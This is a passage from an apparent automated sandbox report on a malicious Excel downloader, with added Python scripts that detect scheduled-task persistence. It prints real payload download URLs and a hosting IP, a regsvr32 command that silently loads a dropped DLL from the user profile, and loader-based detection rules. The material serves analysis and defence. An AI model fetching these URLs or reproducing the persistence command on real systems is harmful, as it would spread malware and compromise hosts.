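BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>C:\Program Files\ExampleVendor\updater.exe</Command>
      <Arguments>/check</Arguments>
    </Exec>
  </Actions>
</Task>"""


def local_name(tag):
    """Strip the XML namespace so the audit also works on tasks exported without one."""
    return tag.rsplit("}", 1)[-1]


def exec_actions(xml_text):
    """Yield (command, arguments) for every <Exec> action in a task definition."""
    root = ET.fromstring(xml_text)
    for el in root.iter():
        if local_name(el.tag) != "Exec":
            continue
        fields = {local_name(c.tag): (c.text or "").strip() for c in el}
        yield fields.get("Command", ""), fields.get("Arguments", "")


def audit_task(xml_text):
    """Reasons this task looks like loader-based persistence; empty if clean."""
    reasons = []
    for command, arguments in exec_actions(xml_text):
        exe = command.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if exe in LOADERS:
            reasons.append("loader-command:" + exe)
        if USER_PATH.search(command) or USER_PATH.search(arguments):
            reasons.append("user-profile-path")
    return reasons


def audit_tasks(tasks):
    """Map task name -> reasons for every task in a {name: xml} dict."""
    return {name: audit_task(xml) for name, xml in tasks.items()}


if __name__ == "__main__":
    for name, reasons in audit_tasks({"upd": SUSPECT_TASK, "vendor-update": BENIGN_TASK}).items():
        print(name, reasons or "clean")
```

Matching on the local element name rather than the full namespaced tag keeps the audit working on task XML that tooling has re-serialised without the schema namespace; the user-profile check is applied to both the command and its arguments because the loader itself lives in System32 and only the payload path gives the task away.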

Screenshots

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
plan-1053707320.xlsb | 26% | Virustotal |
plan-1053707320.xlsb | 28% | ReversingLabs | Document-Excel.Downloader.EncDoc

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ka[1].htm | 100% | Joe Sandbox ML |
C:\Users\user\gihi1.dll | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ka[1].htm | 100% | Joe Sandbox ML |
C:\Users\user\gihi2.dll | 100% | Joe Sandbox ML |

Unpacked PE Files

Source | Detection | Scanner | Label
6.2.regsvr32.exe.10000000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen3
4.2.explorer.exe.1100000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen3
3.2.regsvr32.exe.10000000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen3
13.2.explorer.exe.660000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen3

Domains

Source | Detection | Scanner | Label
carpascapital.com | 2% | Virustotal |
gruasphenbogota.com | 2% | Virustotal |

URLs

Source | Detection | Scanner | Label
https://cdn.entity. | 0% | URL Reputation | safe
https://powerlift.acompli.net | 0% | URL Reputation | safe
https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe
https://cortana.ai | 0% | URL Reputation | safe
https://api.aadrm.com/ | 0% | URL Reputation | safe
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Virustotal |
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Avira URL Cloud | safe
https://gruasphenbogota.com/C74hwGGxi/ka.html | 0% | Avira URL Cloud | safe
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe
https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe
https://officeci.azurewebsites.net/api/ | 0% | Avira URL Cloud | safe
https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
https://store.officeppe.com/addinstemplate | 0% | URL Reputation | safe
https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe
https://www.odwebp.svc.ms | 0% | URL Reputation | safe
https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe
https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe
https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe
https://ncus.contentsync. | 0% | URL Reputation | safe
https://apis.live.net/v5.0/ | 0% | URL Reputation | safe
https://wus2.contentsync. | 0% | URL Reputation | safe
https://asgsmsproxyapi.azurewebsites.net/ | 0% | Avira URL Cloud | safe
https://carpascapital.com/gBPg8MtsGbv/ka.html% | 0% | Avira URL Cloud | safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 0% | URL Reputation | safe
https://ncus.pagecontentsync. | 0% | URL Reputation | safe
https://skyapi.live.net/Activity/ | 0% | URL Reputation | safe
https://dataservice.o365filtering.com | 0% | URL Reputation | safe
https://api.cortana.ai | 0% | URL Reputation | safe
https://ovisualuiapp.azurewebsites.net/pbiagave/ | 0% | Avira URL Cloud | safe
https://directory.services. | 0% | URL Reputation | safe

Note that the two payload URLs, https://gruasphenbogota.com/C74hwGGxi/ka.html and https://carpascapital.com/gBPg8MtsGbv/ka.html%, were rated 0% / safe at analysis time even though the behavior graph shows EXCEL.EXE fetching the PE32 payload (cached as ka[1].htm) from gruasphenbogota.com during this run; URL reputation lags a fresh campaign and is not a substitute for blocking Office-spawned downloads.

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
carpascapital.com | 50.116.92.246 | true | false | | unknown
gruasphenbogota.com | 50.116.92.246 | true | false | | unknown

Both payload hosts resolve to the same address, 50.116.92.246, so a single IP-level block covers both download locations used by the macro.

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://api.diagnosticssdf.office.comA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
            high
            https://login.microsoftonline.com/A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
              high
              https://shell.suite.office.com:1443A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                high
                https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                  high
                  https://autodiscover-s.outlook.com/A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                    high
                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                      high
                      https://cdn.entity.A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://api.addins.omex.office.net/appinfo/queryA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                        high
                        https://clients.config.office.net/user/v1.0/tenantassociationkeyA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                          high
                          https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                            high
                            https://powerlift.acompli.netA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://rpsticket.partnerservices.getmicrosoftkey.comA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://lookup.onenote.com/lookup/geolocation/v1A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                              high
                              https://cortana.aiA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://cloudfiles.onenote.com/upload.aspx | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://entitlement.diagnosticssdf.office.com | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://api.aadrm.com/ | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | URL Reputation: safe (x4) | unknown
https://ofcrecsvcapi-int.azurewebsites.net/ | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://api.microsoftstream.com/api/ | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://cr.office.com | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://gruasphenbogota.com/C74hwGGxi/ka.html | intlsheet1.bin | false | Avira URL Cloud: safe | unknown
https://portal.office.com/account/?ref=ClientMeControl | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://graph.ppe.windows.net | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://res.getmicrosoftkey.com/api/redemptionevents | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | URL Reputation: safe (x3) | unknown
https://powerlift-frontdesk.acompli.net | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | URL Reputation: safe (x3) | unknown
https://tasks.office.com | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://officeci.azurewebsites.net/api/ | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | Avira URL Cloud: safe | unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://store.office.cn/addinstemplate | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | URL Reputation: safe (x3) | unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid= | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://globaldisco.crm.dynamics.com | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://store.officeppe.com/addinstemplate | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | URL Reputation: safe (x3) | unknown
https://dev0-api.acompli.net/autodetect | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | URL Reputation: safe (x3) | unknown
https://www.odwebp.svc.ms | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | URL Reputation: safe (x3) | unknown
https://api.powerbi.com/v1.0/myorg/groups | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://web.microsoftstream.com/video/ | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://graph.windows.net | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://dataservice.o365filtering.com/ | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | URL Reputation: safe (x3) | unknown
https://officesetup.getmicrosoftkey.com | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | URL Reputation: safe (x3) | unknown
https://analysis.windows.net/powerbi/api | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://prod-global-autodetect.acompli.net/autodetect | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | URL Reputation: safe (x3) | unknown
https://outlook.office365.com/autodiscover/autodiscover.json | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://ncus.contentsync. | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | URL Reputation: safe (x3) | unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
http://weather.service.msn.com/data.aspx | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://apis.live.net/v5.0/ | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | URL Reputation: safe (x3) | unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://management.azure.com | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://wus2.contentsync. | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | URL Reputation: safe (x3) | unknown
https://incidents.diagnostics.office.com | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://clients.config.office.net/user/v1.0/ios | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://insertmedia.bing.office.net/odc/insertmedia | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://o365auditrealtimeingestion.manage.office.com | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://outlook.office365.com/api/v1.0/me/Activities | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://api.office.net | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://incidents.diagnosticssdf.office.com | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://asgsmsproxyapi.azurewebsites.net/ | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | Avira URL Cloud: safe | unknown
https://clients.config.office.net/user/v1.0/android/policies | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://entitlement.diagnostics.office.com | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://outlook.office.com/ | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://storage.live.com/clientlogs/uploadlocation | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://templatelogging.office.com/client/log | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://outlook.office365.com/ | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://webshell.suite.office.com | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://carpascapital.com/gBPg8MtsGbv/ka.html% | intlsheet1.bin | false | Avira URL Cloud: safe | unknown
https://management.azure.com/ | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://login.windows.net/common/oauth2/authorize | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | URL Reputation: safe (x3) | unknown
https://graph.windows.net/ | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://api.powerbi.com/beta/myorg/imports | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://devnull.onenote.com | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://ncus.pagecontentsync. | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | URL Reputation: safe (x3) | unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://messaging.office.com/ | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://augloop.office.com/v2 | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://skyapi.live.net/Activity/ | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | URL Reputation: safe (x3) | unknown
https://clients.config.office.net/user/v1.0/mac | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://dataservice.o365filtering.com | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | URL Reputation: safe (x3) | unknown
https://api.cortana.ai | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | URL Reputation: safe (x3) | unknown
https://onedrive.live.com | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://ovisualuiapp.azurewebsites.net/pbiagave/ | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | Avira URL Cloud: safe | unknown
https://visio.uservoice.com/forums/368202-visio-on-devices | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high
https://directory.services. | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | URL Reputation: safe (x3) | unknown
https://login.windows-ppe.net/common/oauth2/authorize | A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.dr | false | - | high

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
50.116.92.246 | carpascapital.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 440113
Start date: 24.06.2021
Start time: 20:50:58
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 59s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: plan-1053707320.xlsb
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 33
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                        Technologies:
                                                                                                                                                        • HCA enabled
                                                                                                                                                        • EGA enabled
                                                                                                                                                        • HDC enabled
                                                                                                                                                        • AMSI enabled
                                                                                                                                                        Analysis Mode:default
                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                        Detection:MAL
                                                                                                                                                        Classification:mal100.troj.expl.evad.winXLSB@20/19@2/1
                                                                                                                                                        EGA Information:
                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                        HDC Information:
                                                                                                                                                        • Successful, ratio: 60.8% (good quality ratio 57.1%)
                                                                                                                                                        • Quality average: 79%
                                                                                                                                                        • Quality standard deviation: 28.6%
                                                                                                                                                        HCA Information:
                                                                                                                                                        • Successful, ratio: 81%
                                                                                                                                                        • Number of executed functions: 0
                                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                                        Cookbook Comments:
                                                                                                                                                        • Adjust boot time
                                                                                                                                                        • Enable AMSI
                                                                                                                                                        • Found application associated with file extension: .xlsb
                                                                                                                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                        • Attach to Office via COM
                                                                                                                                                        • Scroll down
                                                                                                                                                        • Close Viewer
                                                                                                                                                        Warnings:
                                                                                                                                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, wermgr.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                        • TCP Packets have been reduced to 100
                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 92.122.145.220, 13.64.90.137, 13.88.21.125, 52.109.32.63, 52.109.12.23, 20.82.210.154, 52.147.198.201, 20.54.104.15, 20.54.7.98, 40.112.88.60, 173.222.108.210, 173.222.108.226, 80.67.82.235, 80.67.82.211, 20.50.102.62, 20.190.159.133, 20.190.159.131, 40.126.31.140, 40.126.31.3, 40.126.31.138, 40.126.31.2, 20.190.159.135, 20.190.159.137, 52.255.188.83
                                                                                                                                                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, www.tm.a.prd.aadg.trafficmanager.net, e12564.dspb.akamaiedge.net, login.live.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information
                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.

                                                                                                                                                        Simulations

                                                                                                                                                        Behavior and APIs

Time      Type            Description
20:52:13  Task Scheduler  Run new task: wtdsqwcv path: regsvr32.exe s>-s "C:\Users\user\gihi1.dll"
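The scheduled task above is the persistence mechanism: a randomly named task that has regsvr32.exe silently load a DLL dropped in the user's profile root. As an added example (not part of the Joe Sandbox report or of the sample), the script below hunts for that pattern in the output of `schtasks /query /v /fo CSV`. The task name and DLL path in the sample rows are the ones the report logged; the hostname, the benign tasks, the reduced column set and the inclusion of rundll32 as a second loader are constructed assumptions.

```python
import csv
import io
import re
from pathlib import PureWindowsPath
from typing import Dict, List, Optional

# LOLBins whose command line names a DLL to load. regsvr32 is what the sandbox
# observed; rundll32 is added as the obvious sibling (assumption, not from the report).
DLL_LOADERS = {"regsvr32.exe", "rundll32.exe"}

# Directory prefixes a standard user can write to. A scheduled task that loads a
# DLL from one of these is the pattern seen in the report (C:\Users\user\gihi1.dll).
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")

# Constructed, abridged sample of `schtasks /query /v /fo CSV` output (not from the
# report). The first task reproduces what the sandbox logged: task "wtdsqwcv" running
# regsvr32.exe -s on C:\Users\user\gihi1.dll. Hostname and other tasks are made up
# to give the rule benign rows to ignore, including a legitimate regsvr32 task.
SAMPLE_SCHTASKS_CSV = r'''"HostName","TaskName","Status","Author","Task To Run","Run As User","Schedule Type"
"WIN10-VM","\wtdsqwcv","Ready","user","regsvr32.exe -s ""C:\Users\user\gihi1.dll""","user","One Time Only"
"WIN10-VM","\Microsoft\Windows\Defrag\ScheduledDefrag","Ready","Microsoft Corporation","%windir%\system32\defrag.exe -c -h -o -$","SYSTEM","Multiple schedule types"
"WIN10-VM","\Microsoft\Windows\Shell\CreateObjectTask","Ready","Microsoft Corporation","COM handler","SYSTEM","Multiple schedule types"
"WIN10-VM","\Vendor\RegisterControl","Ready","Administrator","regsvr32.exe /s C:\Windows\System32\vendorctl.dll","SYSTEM","At system start up"
'''


def _tokenize(command: str) -> List[str]:
    """Split a Windows command line on whitespace while keeping quoted paths whole."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', command)]


def analyse_task_command(command: str) -> Optional[Dict[str, object]]:
    """Describe a 'Task To Run' value if it invokes a DLL loader; otherwise return None."""
    tokens = _tokenize(command)
    if not tokens:
        return None
    loader = PureWindowsPath(tokens[0]).name.lower()
    if loader not in DLL_LOADERS:
        return None
    info: Dict[str, object] = {"loader": loader, "silent": False, "dll": None, "user_writable": False}
    for arg in tokens[1:]:
        low = arg.lower()
        if low in ("-s", "/s"):
            info["silent"] = True  # regsvr32 -s: suppress the success/failure dialog
            continue
        # rundll32 takes "path.dll,EntryPoint"; keep only the path part.
        path = low.split(",", 1)[0]
        if path.endswith(".dll"):
            info["dll"] = arg.split(",", 1)[0]
            info["user_writable"] = path.startswith(USER_WRITABLE_PREFIXES)
    return info


def find_suspicious_tasks(schtasks_csv: str) -> List[Dict[str, object]]:
    """Return tasks whose action loads a DLL from a user-writable directory via a LOLBin."""
    hits: List[Dict[str, object]] = []
    for row in csv.DictReader(io.StringIO(schtasks_csv)):
        info = analyse_task_command(row.get("Task To Run", ""))
        if info and info["user_writable"]:
            hits.append({"task": row["TaskName"], "run_as": row.get("Run As User"), **info})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_tasks(SAMPLE_SCHTASKS_CSV):
        print(f"{hit['task']}: {hit['loader']} loads {hit['dll']} "
              f"(silent={hit['silent']}) as {hit['run_as']}")
```

The rule deliberately keys on the DLL location rather than on regsvr32 itself: vendors do register controls from System32 with regsvr32 /s, so the constructed `\Vendor\RegisterControl` row is ignored while the `\wtdsqwcv` row is reported. On a live host, pipe `schtasks /query /v /fo CSV` into `find_suspicious_tasks` and review every hit's DLL hash against the dropped-file list.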

                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                        IPs

Match          Associated Sample Name / URL  Detection
50.116.92.246  plan-1053707320.xlsb          malicious
               plan-930205822.xlsb           malicious
               plan-277786552.xlsb           malicious

                                                                                                                                                              Domains

Match                Associated Sample Name / URL  Detection  Context
carpascapital.com    plan-930205822.xlsb           malicious  50.116.92.246
                     plan-277786552.xlsb           malicious  50.116.92.246
gruasphenbogota.com  plan-1053707320.xlsb          malicious  50.116.92.246
                     plan-930205822.xlsb           malicious  50.116.92.246
                     plan-277786552.xlsb           malicious  50.116.92.246

                                                                                                                                                              ASN

Match                Associated Sample Name / URL            Detection  Context
UNIFIEDLAYER-AS-1US  plan-1053707320.xlsb                    malicious  50.116.92.246
                     factura y factura de la vía aérea.exe   malicious  74.220.199.6
                     T5gtQGRL8u.exe                          malicious  162.241.135.156
                     PO 74230360.xlsb                        malicious  162.241.114.107
                     PO 74230360.xlsb                        malicious  162.241.114.107
                     PO 74230360.xlsb                        malicious  162.241.114.107
                     plan-930205822.xlsb                     malicious  50.116.92.246
                     7UXBXIr31E.exe                          malicious  192.185.198.10
                     TW8o2zNu2Q.exe                          malicious  50.116.109.135
                     xwKdahKPn8.exe                          malicious  108.167.164.216
                     plan-277786552.xlsb                     malicious  50.116.92.246
                     Order.exe                               malicious  108.167.183.94
                     0rder-bcm_23062021.exe                  malicious  50.87.249.240
                     wdxYcFUCJV.exe                          malicious  74.220.199.6
                     Inv 820984.xlsb                         malicious  162.144.12.168
                     N0vpYgIYpv.exe                          malicious  162.241.216.218
                     droxoUY6SU.exe                          malicious  192.185.185.25
                     idea-22543577.xlsm                      malicious  108.167.165.249
                     idea-22543577.xlsm                      malicious  108.167.165.249
                     Fra8994.exe                             malicious  162.241.60.126

Only the rows whose context IP is 50.116.92.246 (the other plan-*.xlsb submissions) share infrastructure with this sample. AS46606 is a large shared-hosting network, so the remaining matches show other malware families hosted at the same provider, not a link to this campaign.

                                                                                                                                                              JA3 Fingerprints

Match                             Associated Sample Name / URL               Detection  Context
37f463bf4616ecd445d4a1937da06e19  plan-1053707320.xlsb                       malicious  50.116.92.246
                                  Oqq8nQNRt0.exe                             malicious  50.116.92.246
                                  DocuSign-June-SOA-Dues.261.htm             malicious  50.116.92.246
                                  Invoice 715320 paul@forthebiome.com.html   malicious  50.116.92.246
                                  Quote Requirment R2106131401 .docx         malicious  50.116.92.246
                                  h2GeNTLcFz.xls                             malicious  50.116.92.246
                                  iLNAALfs8Y.exe                             malicious  50.116.92.246
                                  OsAwg7NTuy.exe                             malicious  50.116.92.246
                                  Terms and Conditions pdf.exe               malicious  50.116.92.246
